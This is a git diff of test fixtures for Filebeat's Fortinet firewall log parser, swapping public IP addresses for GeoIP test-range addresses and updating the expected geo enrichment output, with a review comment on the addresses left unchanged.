"network.protocol": "snmp", "network.transport": "udp", @@ -60,7 +61,7 @@ "observer.vendor": "Fortinet", "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "rule.category": "unscanned", "rule.id": "0", 
@@ -77,14 +78,15 @@ }, { "@timestamp": "2020-04-23T12:14:09.000-05:00", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.port": 53, "event.action": "dns", "event.category": [ @@ -117,8 +119,8 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "warning", - "log.offset": 571, - "network.community_id": "1:3UJ+CJ3YHclw01NEh4cnwf958wY=", + "log.offset": 576, + "network.community_id": "1:XfJvzLBAUivFLHoCO1CY6XoPK/8=", "network.iana_number": "17", "network.protocol": "dns", "network.transport": "udp", @@ -131,8 +133,8 @@ "observer.type": "firewall", "observer.vendor": "Fortinet", "related.ip": [ - "192.168.1.6", - "8.8.8.8" + "175.16.199.1", + "192.168.1.6" ], "rule.category": "unscanned", "rule.id": "26", @@ -149,14 +151,7 @@ }, { "@timestamp": "2020-04-23T12:11:51.000-05:00", - "destination.as.number": 40386, - "destination.as.organization.name": "Bloomip Inc.", "destination.bytes": 65446, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "8.6.4.7", "destination.packets": 1045601, "destination.port": 6000, 
@@ -194,9 +189,9 @@ "fortinet.firewall.vwlid": "0", "input.type": "log", "log.level": "notice", - "log.offset": 1163, + "log.offset": 1173, "network.bytes": 504096, - "network.community_id": "1:1+gwRFW+FnJQJZjzI/5oD2giJeY=", + "network.community_id": "1:0Eqo4bxxbVP3bSKsiVJ4ynR2uB8=", "network.iana_number": "17", "network.packets": 1769018, "network.protocol": "portname", @@ -210,7 +205,7 @@ "observer.type": "firewall", "observer.vendor": "Fortinet", "related.ip": [ - "192.168.10.10", + "175.16.199.1", "8.6.4.7" ], "rule.category": "unknown", @@ -219,19 +214,18 @@ "rule.ruleset": "policy", "rule.uuid": "1765de8-5a13-765da73fdsfa1c", "service.type": "fortinet", - "source.as.number": 4808, - "source.as.organization.name": "China Unicom Beijing Province Network", + "source.as.number": 35908, "source.bytes": 438650, - "source.geo.city_name": "Beijing", + "source.geo.city_name": "Changchun", "source.geo.continent_name": "Asia", "source.geo.country_iso_code": "CN", "source.geo.country_name": "China", - "source.geo.location.lat": 39.9288, - "source.geo.location.lon": 116.3889, - "source.geo.region_iso_code": "CN-BJ", - "source.geo.region_name": "Beijing", - "source.ip": "192.168.10.10", - "source.nat.ip": "123.123.123.123", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", + "source.nat.ip": "67.43.156.12", "source.nat.port": 60964, "source.packets": 723417, "source.port": 6000, 
@@ -242,15 +236,16 @@ }, { "@timestamp": "2020-04-23T12:11:48.000-05:00", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 20, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "2001:4860:4860::8888", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.144", "destination.packets": 0, "event.action": "accept", "event.category": [ @@ -281,15 +276,15 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "notice", - "log.offset": 1897, + "log.offset": 1903, "network.application": "icmp6/25/0", "network.bytes": 3034, - "network.community_id": "1:ajyH1GcZSUXhLMFORcVo2L1sA1Y=", + "network.community_id": "1:88ozpFHdjx44KUIm/9vfDoO2jsk=", "network.iana_number": "58", "network.packets": 4, "network.protocol": "icmp6/1/0", "network.transport": "ipv6-icmp", - "network.type": "ipv6", + "network.type": "ipv4", "observer.egress.interface.name": "unknown0", "observer.ingress.interface.name": "port1", "observer.name": "newfirewall", 
@@ -298,21 +293,22 @@ "observer.type": "firewall", "observer.vendor": "Fortinet", "related.ip": [ - "2001:4860:4860::8888" + "81.2.69.144" ], "rule.category": "unscanned", "rule.id": "0", "rule.ruleset": "someotherpolicy", "service.type": "fortinet", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", "source.bytes": 3014, - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "2001:4860:4860::8888", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.144", "source.packets": 4, "tags": [ "fortinet-firewall", @@ -321,15 +317,16 @@ }, { "@timestamp": "2020-04-23T13:10:57.000-04:00", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 10, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 40, "event.action": "accept", "event.category": [ 
@@ -362,10 +359,10 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "notice", - "log.offset": 2447, + "log.offset": 2435, "network.application": "PING", "network.bytes": 10, - "network.community_id": "1:e4Ubz/EgdwpC5IEhMK4GmP2pwJM=", + "network.community_id": "1:egBfbLgtrijMKr5zptNNyYdllaE=", "network.iana_number": "1", "network.packets": 40, "network.protocol": "ping", @@ -379,20 +376,23 @@ "observer.type": "firewall", "observer.vendor": "Fortinet", "related.ip": [ - "8.8.8.8", - "9.7.7.7" + "175.16.199.1", + "81.2.69.144" ], "rule.category": "unscanned", "rule.id": "0", "rule.ruleset": "rulepolicy", "service.type": "fortinet", "source.bytes": 0, - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "9.7.7.7", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.144", "source.packets": 0, "tags": [ "fortinet-firewall", @@ -434,7 +434,7 @@ "fortinet.firewall.vd": "root", "input.type": "log", "log.level": "warning", - "log.offset": 2993, + "log.offset": 2990, "network.community_id": "1:8S1phidNTgIiEGM89KsStyENoH8=", "network.iana_number": "17", "network.protocol": "udp/12302", 
@@ -470,15 +470,16 @@ }, { "@timestamp": "2020-04-23T12:14:28.000-05:00", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 77654, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 70, "destination.port": 442, "event.action": "close", @@ -529,10 +530,10 @@ "fortinet.firewall.wanout": "6671", "input.type": "log", "log.level": "notice", - "log.offset": 3656, + "log.offset": 3653, "network.application": "Skype.Portals", "network.bytes": 78577, - "network.community_id": "1:a9EOn6Ei99BmsI8Wi5+qyGjIUgI=", + "network.community_id": "1:hTeZu8dnUyDg40++rBqS1lZF7AQ=", "network.iana_number": "6", "network.packets": 183, "network.protocol": "https", @@ -546,8 +547,8 @@ "observer.type": "firewall", "observer.vendor": "Fortinet", "related.ip": [ - "192.168.50.50", - "8.8.8.8" + "175.16.199.1", + "81.2.69.145" ], "related.user": [ "elasticuser" 
@@ -558,18 +559,16 @@ "rule.ruleset": "policy", "rule.uuid": "654644c-b064-fdgdf3425-f003-1234ghdf682e05f", "service.type": "fortinet", - "source.as.number": 14618, - "source.as.organization.name": "Amazon.com, Inc.", "source.bytes": 923, - "source.geo.city_name": "Ashburn", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 39.0481, - "source.geo.location.lon": -77.4728, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "192.168.50.50", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.nat.ip": "23.23.23.23", "source.nat.port": 603, "source.packets": 113, @@ -647,14 +646,9 @@ }, { "@timestamp": "2019-05-10T14:18:54.000-02:00", - "destination.as.number": 20940, - "destination.as.organization.name": "Akamai International B.V.", + "destination.as.number": 35994, + "destination.as.organization.name": "Akamai Technologies, Inc.", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "104.80.88.154", "destination.packets": 0, "destination.port": 443, @@ -694,7 +688,7 @@ "log.level": "notice", "log.offset": 5177, "network.bytes": 0, - "network.community_id": "1:xA35Yo5iuXuJBnFVsWZvOqdphyc=", + "network.community_id": "1:FUNVChD2K8kyVo9eGl6FqaTLwPM=", "network.iana_number": "6", "network.packets": 0, "network.protocol": "https", 
@@ -707,24 +701,20 @@ "observer.vendor": "Fortinet", "related.ip": [ "104.80.88.154", - "208.91.114.4" + "67.43.156.15" ], "rule.category": "unscanned", "rule.id": "3", "rule.ruleset": "sniffer", "service.type": "fortinet", - "source.as.number": 40934, - "source.as.organization.name": "Fortinet Inc.", + "source.as.number": 35908, "source.bytes": 0, - "source.geo.city_name": "Surrey", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "CA", - "source.geo.country_name": "Canada", - "source.geo.location.lat": 49.1963, - "source.geo.location.lon": -122.8106, - "source.geo.region_iso_code": "CA-BC", - "source.geo.region_name": "British Columbia", - "source.ip": "208.91.114.4", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.15", "source.nat.ip": "0.0.0.0", "source.nat.port": 0, "source.packets": 0, @@ -824,17 +814,7 @@ }, { "@timestamp": "2019-05-13T16:29:50.000-02:00", - "destination.as.number": 42831, - "destination.as.organization.name": "UK Dedicated Servers Limited", "destination.bytes": 3138, - "destination.geo.city_name": "Coventry", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 52.382, - "destination.geo.location.lon": -1.5874, - "destination.geo.region_iso_code": "GB-COV", - "destination.geo.region_name": "Coventry", "destination.ip": "185.244.31.158", "destination.packets": 5, "destination.port": 80, 
@@ -991,17 +971,7 @@ }, { "@timestamp": "2019-05-15T17:45:34.000-02:00", - "destination.as.number": 16509, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 5266, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "52.216.177.83", "destination.packets": 12, "destination.port": 443, diff --git a/x-pack/filebeat/module/fortinet/firewall/test/utm.log b/x-pack/filebeat/module/fortinet/firewall/test/utm.log index 32bce5c6cc44..318a6938dcbe 100644 --- a/x-pack/filebeat/module/fortinet/firewall/test/utm.log +++ b/x-pack/filebeat/module/fortinet/firewall/test/utm.log 
@@ -1,12 +1,12 @@
-<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony"
-<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based Email"
-<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
-<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
-<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
-<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8, 8.8.4.4" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
-<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium"
-<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access"
-<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN"
+<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony"
+<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based Email"
+<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=175.16.199.1 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
+<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=175.16.199.1 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
+<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="175.16.199.1" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
+<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="175.16.199.1, 8.8.4.4" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
+<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=175.16.199.1 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium"
+<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="175.16.199.1" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access"
+<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN"
 <189>date=2020-04-23 time=13:15:18 devname="testswitch2" devid="someotherid" logid="1700062001" type="utm" subtype="ssl" eventtype="ssl-anomalies" level="notice" vd="root" eventtime=1587230118838592454 tz="-0400" policyid=12 sessionid=42346234 service="HTTPS" user="elasticuser2" group="elasticgroup2" profile="somecerts" srcip=192.168.2.1 srcport=59726 dstip=8.8.4.4 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 action="passthrough" msg="Server certificate passed" reason="untrusted-cert"
 <190>date=2019-05-15 time=18:03:36 logid="1059028704" type="utm" subtype="app-ctrl" eventtype="app-ctrl-all" level="information" vd="root" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=195.8.215.136 srcport=50798 dstport=443 srcintf="port10" srcintfrole="lan" dstintf="port9" dstintfrole="wan" proto=6 service="HTTPS" direction="outgoing" policyid=1 sessionid=4414 applist="block-social.media" appcat="Web.Client" app="HTTPS.BROWSER" action="pass" hostname="www.dailymotion.com" incidentserialno=1962906680 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="*.dailymotion.com" scertissuer="DigiCert SHA2 High Assurance Server CA"
 <190>date=2019-05-13 time=11:45:03 logid="0211008192" type="utm" subtype="virus" eventtype="infected" level="warning" vd="vdom1" eventtime=1557773103767393505 msg="File is infected." action="blocked" service="HTTP" sessionid=359260 srcip=10.1.100.11 dstip=172.16.200.55 srcport=60446 dstport=80 srcintf="port12" srcintfrole="undefined" dstintf="port11" dstintfrole="undefined" policyid=4 proto=6 direction="incoming" filename="eicar.com" quarskip="File-was-not-quarantined." virus="EICAR_TEST_FILE" dtype="Virus" ref="http://www.fortinet.com/ve?vn=EICAR_TEST_FILE" virusid=2172 url="http://172.16.200.55/virus/eicar.com" profile="g-default" agent="curl/7.47.0" analyticscksum="275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f" analyticssubmit="false" crscore=50 craction=2 crlevel="critical"
diff --git a/x-pack/filebeat/module/fortinet/firewall/test/utm.log-expected.json b/x-pack/filebeat/module/fortinet/firewall/test/utm.log-expected.json
index 678dfabebbe3..109d58f54149 100644
--- a/x-pack/filebeat/module/fortinet/firewall/test/utm.log-expected.json
+++ b/x-pack/filebeat/module/fortinet/firewall/test/utm.log-expected.json
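Review bot: The rewritten fixture still mixes routable third-party addresses with the new test-range ones — `dstip=8.8.4.4` on the unchanged ssl-anomalies line, `8.8.4.4` inside the rewritten `ipaddr="175.16.199.1, 8.8.4.4"`, and `dstip=195.8.215.136` on the 2019-05-15 line — so only the events pointing at 175.16.199.1 exercise the geo/AS enrichment, while the expected output for the others (see the utm.log-expected.json hunks that follow) now asserts that those fields are absent. If the goal is, as it appears, to make the golden output independent of the production GeoIP database by using addresses the test database covers, the remaining public addresses should be moved into that range too, or the commit description should state that the missing geo fields on those events are deliberate. Otherwise a later enrichment change that starts resolving those addresses will fail the golden comparison for a reason unrelated to the parser under test.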
@@ -1,15 +1,16 @@
 [
 {
 "@timestamp": "2020-04-23T12:17:48.000-05:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
 "destination.bytes": 1130,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 443,
 "event.action": "blocked",
 "event.category": [
@@ -43,7 +44,7 @@
 "log.offset": 0,
 "message": "URL belongs to a denied category in policy",
 "network.bytes": 2282,
- "network.community_id": "1:jkPSHzqUyADbT5XNqPV58Do0VVg=",
+ "network.community_id": "1:LyyZpRkSbxvRcu1AmbPkX0d9FMs=",
 "network.direction": "outbound",
 "network.iana_number": "6",
 "network.protocol": "https",
@@ -57,8 +58,8 @@
 "observer.type": "firewall",
 "observer.vendor": "Fortinet",
 "related.ip": [
- "192.168.2.1",
- "8.8.8.8"
+ "175.16.199.1",
+ "192.168.2.1"
 ],
 "related.user": [
 "elasticuser"
@@ -82,15 +83,16 @@
 },
 {
 "@timestamp": "2020-04-23T12:17:45.000-05:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
 "destination.bytes": 6812,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
